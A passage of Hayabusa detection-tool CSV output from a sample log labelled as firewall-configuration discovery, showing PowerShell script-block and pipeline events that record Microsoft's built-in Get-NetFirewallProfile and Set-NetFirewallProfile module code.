'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdleti",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 